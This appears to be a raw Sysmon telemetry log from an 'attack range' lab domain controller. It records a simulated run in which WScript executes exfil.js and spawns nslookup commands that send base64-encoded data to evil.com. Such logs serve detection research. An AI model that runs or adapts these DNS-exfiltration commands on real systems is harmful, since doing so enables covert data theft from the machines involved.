14:21:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.580{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7A43-000000005F02}884C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.580{2E1864BB-18EA-629A-7843-000000005F02}47681104C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-7A43-000000005F02}884C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.586{2E1864BB-18EA-629A-7A43-000000005F02}884C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-7843-000000005F02}4768C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleuwi.tmp 2>&1 10341000x8000000000000000208585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.543{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7943-000000005F02}5596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.543{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7943-000000005F02}5596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.543{2E1864BB-18EA-629A-7943-000000005F02}55967644C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7843-000000005F02}4768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.527{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7943-000000005F02}5596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7843-000000005F02}4768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-18E0-629A-6742-000000005F02}39765152C:\Windows\System32\WScript.exe{2E1864BB-18EA-629A-7843-000000005F02}4768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.519{2E1864BB-18EA-629A-7843-000000005F02}4768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleuwi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.511{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxqwo.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.479{2E1864BB-18EA-629A-7643-000000005F02}42963504C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-7743-000000005F02}4932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.474{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.458{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.458{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.458{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.458{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-7743-000000005F02}4932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.458{2E1864BB-18EA-629A-7543-000000005F02}77325580C:\Windows\system32\cmd.exe{2E1864BB-18EA-629A-7743-000000005F02}4932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.469{2E1864BB-18EA-629A-7743-000000005F02}4932C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-7543-000000005F02}7732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxqwo.tmp 2>&1 10341000x8000000000000000208565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.443{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7643-000000005F02}4296C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.443{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-7643-000000005F02}4296C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-50635-false127.0.0.1-53domain 354300x8000000000000000208562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50635- 354300x8000000000000000208561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-50635-false127.0.0.1-53domain 354300x8000000000000000208560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-50634-false127.0.0.1-53domain 354300x8000000000000000208559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50634- 354300x8000000000000000208558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-50634-false127.0.0.1-53domain 354300x8000000000000000208557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-50633-false127.0.0.1-53domain 354300x8000000000000000208556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50633- 354300x8000000000000000208555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.051{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-50633-false127.0.0.1-53domain 354300x8000000000000000208554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-50632-false127.0.0.1-53domain 354300x8000000000000000208553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50632- 354300x8000000000000000208552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-50632-false127.0.0.1-53domain 354300x8000000000000000208551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.976{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-50631-false127.0.0.1-53domain 